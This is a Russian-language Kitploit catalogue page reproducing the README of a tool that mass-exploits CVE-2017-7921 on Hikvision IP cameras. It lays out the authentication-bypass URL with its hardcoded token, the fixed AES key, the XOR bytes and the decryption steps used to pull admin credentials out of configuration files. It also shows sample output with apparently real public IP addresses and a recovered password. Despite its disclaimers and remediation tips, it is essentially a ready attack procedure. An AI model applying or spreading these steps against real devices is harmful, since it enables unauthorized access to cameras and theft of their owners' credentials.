Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-7921-Research-Toolkit — Предназначен для быстрой проверки уязвимости CVE-2017-7921 в устройствах Hikvision с помощью FOFA, получения учетных данных для входа и вывода результатов в файл JSON. | Kitploit
Инструменты/GitHubGitHub/wyl-cmd/cve-2017-7921-research-toolkit
Сканеры уязвимостейИнструменты шифрования/дешифрованияБезопасность IoTЭксплуатацияЭксплуатация веб-приложенийСбор информации
GitHubwyl-cmd/cve-2017-7921-research-toolkit

CVE-2017-7921-Research-Toolkit

Предназначен для быстрой проверки уязвимости CVE-2017-7921 в устройствах Hikvision с помощью FOFA, получения учетных данных для входа и вывода результатов в файл JSON.

Репозиторий
5161 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2017-7921 Research Toolkit

Заявление о безопасности: данный инструмент предназначен только для авторизованных исследований безопасности и проверки уязвимостей

Содержание

  • Юридические и этические заявления
  • Описание проекта
  • Функциональные возможности
  • Инструкция по установке
  • Инструкция по использованию
  • Результаты вывода
  • Рекомендации по защите и исправлению
  • Технические детали
  • Благодарности

⚖️ Юридические и этические заявления

Важное примечание: использование данного инструмента означает ваше согласие со следующими условиями

  • Только авторизованное тестирование: используйте только на системах, на которые у вас есть явное письменное разрешение
  • Соблюдение законодательства: строго соблюдайте Закон о кибербезопасности и соответствующие местные законы
  • Ответственное раскрытие: при обнаружении уязвимости сообщайте о ней производителю через официальные каналы
  • Образовательные цели: инструмент предназначен для повышения осведомлённости о безопасности IoT
  • Ответственность за последствия: юридические последствия неправомерного использования ложатся на пользователя

Данный проект следует политике безопасности GitHub и правилам раскрытия Центра безопасности Hikvision.


📖 Описание проекта

Инструмент для массового обнаружения и проверки уязвимости обхода аутентификации CVE-2017-7921 в IP-камерах Hikvision. Поддерживает автоматическое дешифрование конфигурационных файлов и извлечение учётных данных.

Цели разработки

  • Помочь исследователям безопасности оценить состояние безопасности крупных групп устройств
  • Предоставить владельцам устройств возможность самопроверки
  • Поддержка генерации отчётов с рекомендациями по исправлению
  • Содействие обновлению безопасности устройств IoT

✨ Функциональные возможности

  • ✅ Массовое сканирование списка устройств в формате JSON
  • ✅ Многопоточное параллельное обнаружение (настраиваемое количество потоков)
  • ✅ Автоматическая загрузка зашифрованных конфигурационных файлов
  • ✅ Расшифровка в реальном времени и извлечение учётных данных для входа
  • ✅ Индикатор хода сканирования в реальном времени (tqdm)
  • ✅ Автоматическое сохранение результатов в отчёт JSON
  • ✅ Поддержка продолжения сканирования после прерывания

🛠️ Инструкция по установке

Требования к окружению

  • Python 3.7 или выше
  • Только Linux / macOS (в Windows некоторые функции ограничены)

Установка зависимостей

root@kitploit:~
git clone https://github.com/[ваше_имя_пользователя]/CVE-2017-7921-Research-Toolkit.git
cd CVE-2017-7921-Research-Toolkit
pip install -r requirements.txt

Содержимое requirements.txt

root@kitploit:~
requests>=2.28.0
pycryptodome>=3.15.0
tqdm>=4.64.0

📊 Инструкция по использованию

1. Подготовка файла с данными устройств

Создайте папку zc/ в каталоге инструмента и поместите туда список устройств в формате JSON (каждая строка – один объект устройства):

root@kitploit:~
mkdir zc

Пример файла: devices_2025.json

root@kitploit:~
{"city":"Lisbon","country":"PT","host":"109.50.152.186","link":"http://109.50.152.186:80"}
{"city":"Sao Paulo","country":"BR","host":"200.201.192.75","link":"http://200.201.192.75:8080"}

Описание полей:

ПолеОписаниеОбязательно
linkHTTP/HTTPS адрес устройства✅ Да
cityГород❌ Нет
countryКод страны❌ Нет
orgОрганизация/ISP❌ Нет

2. Запуск инструмента сканирования

root@kitploit:~
python batch_decrypt.py

3. Пример интерактивной работы

root@kitploit:~
════════════════════════════════════════════════════════════════════════════════
Инструмент массового сканирования уязвимости конфигурационных файлов камер Hikvision
════════════════════════════════════════════════════════════════════════════════

Доступные JSON-файлы:
════════════════════════════════════════════════════════════════════════════════
1. devices_2025.json (45,678 байт)
════════════════════════════════════════════════════════════════════════════════

Выберите номер файла: 1
Выбран файл: devices_2025.json
Загрузка данных устройств...

Всего устройств для сканирования: 2000
Введите количество потоков (по умолчанию: 5): 10
Количество потоков: 10
Начало сканирования...

Всего отсканировано устройств: 2000
Обнаружено уязвимых устройств: 127

Уязвимые устройства сохранены в: vulnerable_devices.json

📁 Результаты вывода

После завершения сканирования генерируется файл vulnerable_devices.json, содержащий информацию обо всех уязвимых устройствах.

Пример вывода:

root@kitploit:~
[
  {
    "url": "http://109.50.152.186",
    "config_url": "http://109.50.152.186/System/configurationFile?auth=YWRtaW46MTEK",
    "username": "admin",
    "password": "123456",
    "city": "Lisbon",
    "country": "PT",
    "org": "ISP Telecom",
    "status": "success"
  }
]

🛡️ Рекомендации по защите и исправлению

Для владельцев устройств

  1. Немедленно обновите прошивку: посетите официальный сайт Hikvision для загрузки последней версии
  2. Измените пароль по умолчанию: даже после обновления смените пароль администратора по умолчанию
  3. Сетевая изоляция: размещайте камеры в отдельной VLAN, запретите прямой доступ из глобальной сети
  4. Включите белый список IP: разрешите доступ к интерфейсу управления только с доверенных IP-адресов

Для специалистов по безопасности

  1. Соблюдайте конфиденциальность результатов сканирования: не разглашайте подробности об устройствах, которые ещё не исправлены
  2. Помогайте с исправлением: активно связывайтесь с владельцами устройств для оказания технической поддержки
  3. Составляйте отчёты в соответствии с нормативными требованиями: создавайте отчёты по оценке безопасности, соответствующие стандарту ISO 27001

🔬 Технические детали

Принцип уязвимости

  • Обход аутентификации: /System/configurationFile?auth=YWRtaW46MTEK использует жёстко закодированные учётные данные
  • Слабое шифрование: конфигурационный файл зашифрован фиксированным ключом AES-ECB
  • Утечка ключа: ключ 279977f62f6cfd2d91cd75b889ce0c9a жёстко закодирован в прошивке

Процесс расшифровки

  1. Получение зашифрованного бинарного конфигурационного файла
  2. Расшифровка AES-ECB (удаление первого блока)
  3. XOR-запутывание (ключ: 0x73, 0x8B, 0x55, 0x44)
  4. Извлечение учётной записи admin и последующего поля пароля с помощью регулярного выражения

📝 Лицензия

Данное программное обеспечение предназначено только для авторизованных исследований безопасности и образовательных целей. Пользователь обязан самостоятельно обеспечить соблюдение всех применимых законов.


🙏 Благодарности

  • Спасибо Hikvision за своевременное реагирование и выпуск обновлений прошивки
  • Благодарность сообществу open source за предоставленные материалы по анализу уязвимости
  • Данный проект следует передовым практикам исследования безопасности IoT

Последнее обновление: 2025-01-29 | Версия: v1.0.0 | Поддержка CVE: CVE-2017-7921

Скачать инструмент